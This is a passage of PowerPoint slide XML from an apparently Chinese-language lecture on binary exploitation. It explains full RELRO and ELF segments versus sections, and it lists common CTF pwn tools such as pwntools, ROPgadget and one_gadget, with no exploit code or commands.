                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>防止程序的一些重定位信息被修改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>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zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>完全 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RELRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在部分 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的基础上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在程序装入时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>直接解析完所有符号并填入对应的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>此时所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表项都已初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>且不装入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6ECD6E-B0BC-4364-ADCF-50984C021417}"/>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内存保护措施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>| RELRO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384314118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8C03585-494F-4FC7-8D36-567CF06A54C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="9649629" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ex2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200"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8CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317667" y="2354677"/>
            <a:ext cx="7730836" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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IDA Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>pwntools</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>pwndbg</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>checksec</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROPgadget</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>one_gadget</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LibcSearcher</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3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>main_arena_offset</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082839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99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="1766830" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"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1055614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68D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588303" y="1034283"/>
            <a:ext cx="4674678"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段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）与节（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">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9ED34666-3964-462A-8D09-714EA26650EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902731" y="1773179"/>
            <a:ext cx="4791286"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一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包含多个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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段视图用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>区域的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权限划分</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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节视图用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编译链接时 与 在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>磁盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上存储时 的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的组织</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1487CD6E-A5C7-4DFD-8290-7072AC2F1A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123264" y="1773179"/>
            <a:ext cx="5299079" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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代码段（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Text segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）包含了代码与只读数据</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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节</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rodata</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节 </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.hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节 </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dynsym</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节 </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dynstr</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节 </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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>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节 </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rel.got</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节 </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a:t>
            </a:r>
          </a:p>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数据段（</a:t>
            </a:r>
            <a:r>
